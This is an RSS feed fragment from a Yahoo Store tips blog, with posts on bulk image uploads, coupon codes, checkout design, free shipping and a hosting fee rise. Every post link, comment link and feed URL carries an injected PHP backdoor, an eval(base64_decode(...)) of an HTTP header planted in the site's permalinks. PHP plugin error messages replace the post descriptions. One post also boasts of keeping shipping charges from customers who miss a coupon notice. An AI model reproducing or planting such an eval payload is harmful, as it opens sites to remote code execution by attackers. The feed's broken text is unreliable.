<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>53</b><br />
]]></description>
			<content:encoded><![CDATA[<p>If you were not aware, you can do a bulk upload of all your images for your Yahoo Store catalog. Of course, the only catch is that the image name must also be the same name as the ID in your store catalog. It can be a little daunting to if you are trying to have SEO friendly page names. Most of the time, your supplier will give you a file (if you are lucky) with their item number and the pictures are usually named the same as the item number. So you may have CB-123 as an item number with an image named CB-123.jpg which is perfect for easy uploading to your store. Once you have your catalog populated, you simply click on CONTROLS in advanced editor mode in your store editor. Once there you will see something like this&#8230;</p>
<p>&nbsp;</p>
<p><img width="700" height="82" align="baseline" alt="multipleimageupload.png" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/multipleimageupload.png" /></p>
<p>&nbsp;</p>
<p>All the images just need to be zipped up (I use <a href="http://www.winzip.com/downwz.htm">Winzip</a>) into zip files and uploaded using the Multiple Image Upload. If all your image names are exactly like your ID&#039;s in your Yahoo Store catalog, then your image will show up just right. Now, the fun part&#8230; did you know you can also do a bulk upload of the second images or Inset images in your store?</p>
<p>In order for this to work, you need to create a new column in your database (.csv file) called inset. In that column, you will list the name of the image but do not put the extension of the image. So basically no .gif or .jpg. After you do this, upload your .csv file using the database upload. Then put all those Inset images into a zip file and upload them using the Multple Image Upload like mentioned above.</p>
<p>Thats it! Now you can buik upload your main image AND your Inset images in your Yahoo Store! Quick and easy.&nbsp;</p>
<p>PS - <a href="http://www.robsnell.com/">Rob Snell</a> just emailed me to say &quot;You can also upload custom-image fields the same way!</p>
<br /><a href="http://www.socialmarker.com/?link=http://www.ystoretutorials.com/blog/2009/04/14/multiple-inset-image-uploads/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/&title=Multiple+Inset+Image+Uploads&text=If+you+were+not+aware%2C+you+can+do+a+bulk+upload+of+all+your+images+for+your+Yahoo+Store+catalog.+Of+course%2C+the+only+catch+is+that+the+image+name+must+also+be+the+same+name+as+the+ID+in+your+store...&tags=your+store%2C+your+yahoo%2C+image%2C+upload%2C+store%2C+images" target="_blank"><img src= "http://www.socialmarker.com/bookmark.gif" border="0" /></a><noscript><a href="http://www.socialmarker.com" >Social Bookmarking</a></noscript>]]></content:encoded>
			<wfw:commentRss>http://www.ystoretutorials.com/blog/2009/04/14/multiple-inset-image-uploads/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
	
	</item>
		<item>
		<title>Do Shoppers Actually Read?</title>
		<link>http://www.ystoretutorials.com/blog/2009/03/10/do-shoppers-actually-read/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.ystoretutorials.com/blog/2009/03/10/do-shoppers-actually-read/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 10 Mar 2009 23:51:02 +0000</pubDate>
		<dc:creator>Britt</dc:creator>
		
		<category><![CDATA[Tips &amp; Tricks]]></category>

		<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.ystoretutorials.com/blog/45/do-shoppers-actually-read/</guid>
		<description><![CDATA[<br />
<b>Warning</b>:  preg_split() [<a href='function.preg-split'>function.preg-split</a>]: Compilation failed: lookbehind assertion is not fixed length at offset 14 in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>51</b><br />
<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>53</b><br />
]]></description>
			<content:encoded><![CDATA[<p>Ya know, this may sound a bit belittling but honestly&#8230;do your shoppers actually read? I ask this question because after having had ecommerce Yahoo stores for a few years now, its apparent to me that shoppers just don&#039;t read. For example,&nbsp;one of my sites that sells <a target="_blank" href="http://www.brightneonsigns.com/neon-open-signs.html">neon open signs</a>, has a free shipping offer. All orders over $150 dollars get free shipping if they simply enter the coupon code &quot;ship4free&quot; at checkout. Its that simple&#8230;or so I thought. Whats so ironic is that I have it plastered all over the shopping cart pages. How can people actually miss this? See below&#8230;</p>
<p><img height="312" alt="ship4free.png" width="946" align="baseline" src="http://www.ystoretutorials.com/blog/wp-content/uploads/image/ship4free.png" /></p>
<p>Now don&#039;t get me wrong, this is actually kinda done on purpose. My site specifically states that the free shipping offer must be done online and by the person doing the ordering and that we cannot go back and substract the shipping later (which I do if they call me). The cool part is that since most people don&#039;t read, we actually get 2 out of 5 orders where people just did not enter then coupon code. Because of this, we make over a thousand dollars per month on this 1 site alone in just shipping charges. Since the price of shipping is already included in the sale price of the neon sign itself, its just extra money in our pocket for people that, well, just don&#039;t read or maybe they just don&#039;t care.</p>
<p>So the question remains&#8230;do shoppers actually read whats on your site? Based on our <a target="_blank" href="http://www.brightneonsigns.com">neon sign</a> website, the answer is yea, about 70% of them do. The other 30% are either to lazy, spending someone elses money and don&#039;t care or still very shaky when it comes to online shopping. Either way or whatever reason it is, you can take advantage of these types of situations and not feel bad about it all.</p>
<p>&nbsp;</p>
<br /><a href="http://www.socialmarker.com/?link=http://www.ystoretutorials.com/blog/2009/03/10/do-shoppers-actually-read/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/&title=Do+Shoppers+Actually+Read%3F&text=Ya+know%2C+this+may+sound+a+bit+belittling+but+honestly%26%238230%3Bdo+your+shoppers+actually+read%3F+I+ask+this+question+because+after+having+had+ecommerce+Yahoo+stores+for+a+few+years+now%2C+its+apparent+to+me...&tags=just+don%26%238217%3Bt%2C+shipping%2C+don%26%238217%3Bt%2C+actually" target="_blank"><img src= "http://www.socialmarker.com/bookmark.gif" border="0" /></a><noscript><a href="http://www.socialmarker.com" >Social Bookmarking</a></noscript>]]></content:encoded>
			<wfw:commentRss>http://www.ystoretutorials.com/blog/2009/03/10/do-shoppers-actually-read/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
	
	</item>
		<item>
		<title>The Importance of the Yahoo Checkout Process</title>
		<link>http://www.ystoretutorials.com/blog/2008/12/29/the-importance-of-the-yahoo-checkout-process/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.ystoretutorials.com/blog/2008/12/29/the-importance-of-the-yahoo-checkout-process/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 30 Dec 2008 02:17:49 +0000</pubDate>
		<dc:creator>Britt</dc:creator>
		
		<category><![CDATA[Conversion]]></category>

		<guid isPermaLink="false">http://www.ystoretutorials.com/blog/44/the-importance-of-the-yahoo-checkout-process/</guid>
		<description><![CDATA[<br />
<b>Warning</b>:  preg_split() [<a href='function.preg-split'>function.preg-split</a>]: Compilation failed: lookbehind assertion is not fixed length at offset 14 in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>51</b><br />
<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>53</b><br />
]]></description>
			<content:encoded><![CDATA[<p>Ya know, Yahoo has really done an outstanding job on their checkout process but you need to take it to another level. The checkout by itself is as plain and drab as it gets. For example, check out this store (<a target="_blank" href="http://buynselleverything.com/">http://buynselleverything.com/</a>) and click on the <strong>View My Cart</strong> link at the top of the page. That is pretty much the stock version of the actual Yahoo shopping cart. Now ask yourself, why would you spend money on designing your logo, creating your site template, programming your store and then not spend as much time, energy and money into the one part of your Yahoo store that actually <strong>makes you money</strong>? Mind boggling aint it? And its not just them, this is all over the place. For example;&nbsp;</p>
<blockquote>
<p><a href="http://www.furniture-zoo.com/" target="_blank">http://www.furniture-zoo.com/</a><br />
<a href="http://www.smallhandsrags.com/" target="_blank">http://www.smallhandsrags.com/</a><br />
<a href="http://www.theoriginalcushie.com/" target="_blank">http://www.theoriginalcushie.com/</a><br />
<a href="http://www.globalgoddessbeauty.com/" target="_blank">http://www.globalgoddessbeauty.com/</a><br />
<a href="http://www.ultimatefitnessgear.com/" target="_blank">http://www.ultimatefitnessgear.com/</a></p>
</blockquote>
<p>And the list goes on and on and on. Its quite amazing actually. Imagine walking into a Belk to go shopping. You smell all the colognes and perfumes, stroll by the leather shoes and then into the men&#039;s department. You pick out an amazing blazer and ask to try it on. You head to the dressing rooms and slip the jacket on and stand in front of the mirror. You cannot believe how awesome this jacket makes you look so you decide to go ahead and make the purchase. You walk up to one of the associates and they direct you downstairs. You head downstairs where you see rust on the stair railings, pipes dripping water overhead and the lights are dull. You reach the checkout counter and are greeted by a guy that has not had a clean shave in 4 days, smells of tobacco, is missing 2 teeth and processes your credit card on an old slide machine.</p>
<p>Now I don&#039;t know about you but if something like that happens to me, I am leaving my stuff down in the basement and getting the hell outta there.</p>
<p>This is what you are putting your customers through when you don&#039;t make sure your checkout process is as good (if not better) than your main site. And the funny thing is, its only <strong>350 dollars to customize your cart</strong> and if you cannot do it yourself, call me! I can do it for you.</p>
<p>Stop watching your customers abandon the shopping cart of your Yahoo Store. The features are there already, you just have to put them all to proper use.</p>
<p>If you want to see how a Yahoo Store checkout should look, here are a few of our stores.</p>
<blockquote>
<p><a href="http://www.replicadungeon.com/" target="_blank">http://www.replicadungeon.com/</a><br />
<a href="http://www.brightneonsigns.com/" target="_blank">http://www.brightneonsigns.com/</a><br />
<a href="http://www.alchemydungeon.com/" target="_blank">http://www.alchemydungeon.com/</a><br />
<a href="http://www.ledsignworks.com/" target="_blank">http://www.ledsignworks.com/</a></p>
</blockquote>
<br /><a href="http://www.socialmarker.com/?link=http://www.ystoretutorials.com/blog/2008/12/29/the-importance-of-the-yahoo-checkout-process/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/&title=The+Importance+of+the+Yahoo+Checkout+Process&text=Ya+know%2C+Yahoo+has+really+done+an+outstanding+job+on+their+checkout+process+but+you+need+to+take+it+to+another+level.+The+checkout+by+itself+is+as+plain+and+drab+as+it+gets.&tags=http+www%2C+store%2C+checkout%2C+yahoo" target="_blank"><img src= "http://www.socialmarker.com/bookmark.gif" border="0" /></a><noscript><a href="http://www.socialmarker.com" >Social Bookmarking</a></noscript>]]></content:encoded>
			<wfw:commentRss>http://www.ystoretutorials.com/blog/2008/12/29/the-importance-of-the-yahoo-checkout-process/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
	
	</item>
		<item>
		<title>Yahoo Store Coupon Codes</title>
		<link>http://www.ystoretutorials.com/blog/2008/12/10/yahoo-store-coupon-codes/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.ystoretutorials.com/blog/2008/12/10/yahoo-store-coupon-codes/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Wed, 10 Dec 2008 17:56:55 +0000</pubDate>
		<dc:creator>Britt</dc:creator>
		
		<category><![CDATA[Tips &amp; Tricks]]></category>

		<guid isPermaLink="false">http://www.ystoretutorials.com/blog/43/yahoo-store-coupon-codes/</guid>
		<description><![CDATA[<br />
<b>Warning</b>:  preg_split() [<a href='function.preg-split'>function.preg-split</a>]: Compilation failed: lookbehind assertion is not fixed length at offset 14 in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>51</b><br />
<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>53</b><br />
]]></description>
			<content:encoded><![CDATA[<p><strike>Were you aware that your shoppers CAN use more than 1 single coupon code at checkout? Most people are simply not aware of this little feature but you can do it. For example, one of my Yahoo stores&nbsp;sell </strike><a href="http://www.brightneonsigns.com/neon-open-signs.html"><strike>neon open signs</strike></a><strike> and we offer free shipping for all orders over 150 dollars. We also have a newsletter that gives registrants a 5% off coupon code. So normally a shopper would plug in 1 of the coupon codes and it would calculate into their cart but what about the other one?</strike></p>
<p><strike>The answer is simple&#8230; your customers just need to add BOTH coupon codes at once separated by a comma. So if you have a coupon that is SHIP4FREE and one coupon code that is 5OFF, your customers would just need to plug in SHIP4FREE, 5OFF at the same time!</strike></p>
<p><strike>Simple little things can make a huge difference. Remember to post a note in your checkout areas so your customers understand how to use more than 1 coupon code at the same time&#8230;if you want to offer this type of thing.</strike></p>
<p><strike>It also works this way for multiple gift certificates. Hope this helps!</strike></p>
<p>Well folks, turns out this is completely wrong. My sources lied to me because I just tried it and it definitely does not work so I am retracting my statements from above. Also, according to Yahoo, the above tactic is supposed to work for multiple gift certificates but that again, is false. What does work for multiple gift certificates is you enter the first certificate and hit apply and then you enter the second gift certificate (and so on) and hit apply and they total up correctly. Go figure, I thought I had a new trick for Yahoo store owners and it turns out to be bogus. O well, hopefully you still learned something from all this mess.</p>
<br /><a href="http://www.socialmarker.com/?link=http://www.ystoretutorials.com/blog/2008/12/10/yahoo-store-coupon-codes/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/&title=Yahoo+Store+Coupon+Codes&text=Were+you+aware+that+your+shoppers+CAN+use+more+than+1+single+coupon+code+at+checkout%3F+Most+people+are+simply+not+aware+of+this+little+feature+but+you+can+do+it.&tags=coupon" target="_blank"><img src= "http://www.socialmarker.com/bookmark.gif" border="0" /></a><noscript><a href="http://www.socialmarker.com" >Social Bookmarking</a></noscript>]]></content:encoded>
			<wfw:commentRss>http://www.ystoretutorials.com/blog/2008/12/10/yahoo-store-coupon-codes/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
	
	</item>
		<item>
		<title>Offer Free Shipping in your Yahoo Store</title>
		<link>http://www.ystoretutorials.com/blog/2008/10/03/offer-free-shipping-in-your-yahoo-store/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.ystoretutorials.com/blog/2008/10/03/offer-free-shipping-in-your-yahoo-store/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Fri, 03 Oct 2008 18:11:51 +0000</pubDate>
		<dc:creator>Britt</dc:creator>
		
		<category><![CDATA[Traffic]]></category>

		<category><![CDATA[Conversion]]></category>

		<guid isPermaLink="false">http://www.ystoretutorials.com/blog/42/offer-free-shipping-in-your-yahoo-store/</guid>
		<description><![CDATA[<br />
<b>Warning</b>:  preg_split() [<a href='function.preg-split'>function.preg-split</a>]: Compilation failed: lookbehind assertion is not fixed length at offset 14 in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>51</b><br />
<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>53</b><br />
]]></description>
			<content:encoded><![CDATA[<p>Ya know, its been said time and time again that we are in an economic crisis and the fact is&#8230;we are. But what can you do to make a difference? Experts continue to advise people to shop online to save time and money. No wear and tear on your car, less frequent gas fillups and no lines is why there has been an increase in online sales over these last 6 months or so.</p>
<p>We all know that traffic is the single most important thing for a successful online business so its your duty to take advantage of all the options your Yahoo Store can provide you with. Coupons are a great way to offer FREE SHIPPING to your customers. You can add a coupon code and tell people that if they purchase X amount you will ship it for free. Just enter the coupon code at checkout.</p>
<p>Its important in these times with more online shoppers that you get an edge over your competition. If you don&#039;t do it, I promise you someone else will. Also be extremely public about your shipping offers. Add an image to your site that specifies that you offer dicounts and free shipping. Don&#039;t assume your customers will see it or search for it. You only have 1 shot at keeping your customers and getting them to buy from you so don&#039;t leave them wondering.</p>
<br /><a href="http://www.socialmarker.com/?link=http://www.ystoretutorials.com/blog/2008/10/03/offer-free-shipping-in-your-yahoo-store/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/&title=Offer+Free+Shipping+in+your+Yahoo+Store&text=Ya+know%2C+its+been+said+time+and+time+again+that+we+are+in+an+economic+crisis+and+the+fact+is%26%238230%3Bwe+are.+But+what+can+you+do+to+make+a+difference%3F&tags=" target="_blank"><img src= "http://www.socialmarker.com/bookmark.gif" border="0" /></a><noscript><a href="http://www.socialmarker.com" >Social Bookmarking</a></noscript>]]></content:encoded>
			<wfw:commentRss>http://www.ystoretutorials.com/blog/2008/10/03/offer-free-shipping-in-your-yahoo-store/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
	
	</item>
		<item>
		<title>Yahoo Store Monthly Fee Increased by 33%</title>
		<link>http://www.ystoretutorials.com/blog/2008/09/02/yahoo-store-monthly-fee-increased-by-33/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://www.ystoretutorials.com/blog/2008/09/02/yahoo-store-monthly-fee-increased-by-33/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 02 Sep 2008 19:33:45 +0000</pubDate>
		<dc:creator>Britt</dc:creator>
		
		<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.ystoretutorials.com/blog/41/yahoo-store-monthly-fee-increased-by-33/</guid>
		<description><![CDATA[<br />
<b>Warning</b>:  preg_split() [<a href='function.preg-split'>function.preg-split</a>]: Compilation failed: lookbehind assertion is not fixed length at offset 14 in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>51</b><br />
<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/ystoretu/public_html/blog/wp-content/plugins/sem-fancy-excerpt/sem-fancy-excerpt.php</b> on line <b>53</b><br />
]]></description>
			<content:encoded><![CDATA[<p>So, like many of you have already noticed, Yahoo increased their hosting fees. Starting Oct 1, 2008, those stores that are on the Standard and Legacy accounts will see a 33% increase in their monthly fee. From 99.99 per month to 129.95 per month. And here&#039;s a little shocker for ya&#8230; check out their info page <a href="http://smallbusiness.yahoo.com/ecommerce/plans.php">http://smallbusiness.yahoo.com/ecommerce/plans.php</a> and you will not see a price change here. So guess what that means? All potentially new Yahoo store owners will get caught in a trap. Can you imagine doing your research, choosing Yahoo Merchant Solutions as their ecommerce solution of choice and within 30 days already get hit with a price increase?! Sounds quite shady really&#8230;</p>
<p>What aggravates me the most is that there is no changes to warrant a 33% increase. Yahoo already takes 1%, or more, of the total sales each month for doing nothing. Now they add an extra 30 bucks a month&#8230;thats like a instant 12 million dollar profit (PER MONTH!) for doing nothing more than they are doing right now.</p>
<p>Don&#039;t get me wrong, I absolutely LOVE Yahoo Stores. Its easy to use, its really search engine friendly and it includes 95% of the features needed to operate an successful online business. I just hate the fact that companies do this type of thing knowing how handicapped most business owners are. I know that I am not packing up and leaving to start over somewhere else and other Yahoo store owners won&#039;t do it either.</p>
<p>Please don&#039;t take this message the wrong way. Sometimes we get used to being able to operate our business as cheaply and efficiently as possible and when someone throws a monkey wrench in the program, we get our panties in a bunch. All in all, a Yahoo store is still one of the cheapest ways to operate an ecommerce business online and as long as Yahoo continues to prove their system produces, we will keep on paying the price.</p>
<p>But it doesn&#039;t mean we cannot gripe about it from time to time;-p</p>
<br /><a href="http://www.socialmarker.com/?link=http://www.ystoretutorials.com/blog/2008/09/02/yahoo-store-monthly-fee-increased-by-33/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/&title=Yahoo+Store+Monthly+Fee+Increased+by+33%25&text=So%2C+like+many+of+you+have+already+noticed%2C+Yahoo+increased+their+hosting+fees.+Starting+Oct+1%2C+2008%2C+those+stores+that+are+on+the+Standard+and+Legacy+accounts+will+see+a+33%25+increase+in+their+monthly...&tags=yahoo%2C+their" target="_blank"><img src= "http://www.socialmarker.com/bookmark.gif" border="0" /></a><noscript><a href="http://www.socialmarker.com" >Social Bookmarking</a></noscript>]]></content:encoded>
			<wfw:commentRss>http://www.ystoretutorials.com/blog/2008/09/02/yahoo-store-monthly-fee-increased-by-33/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
	
	</item>
	</channel>
</rss>
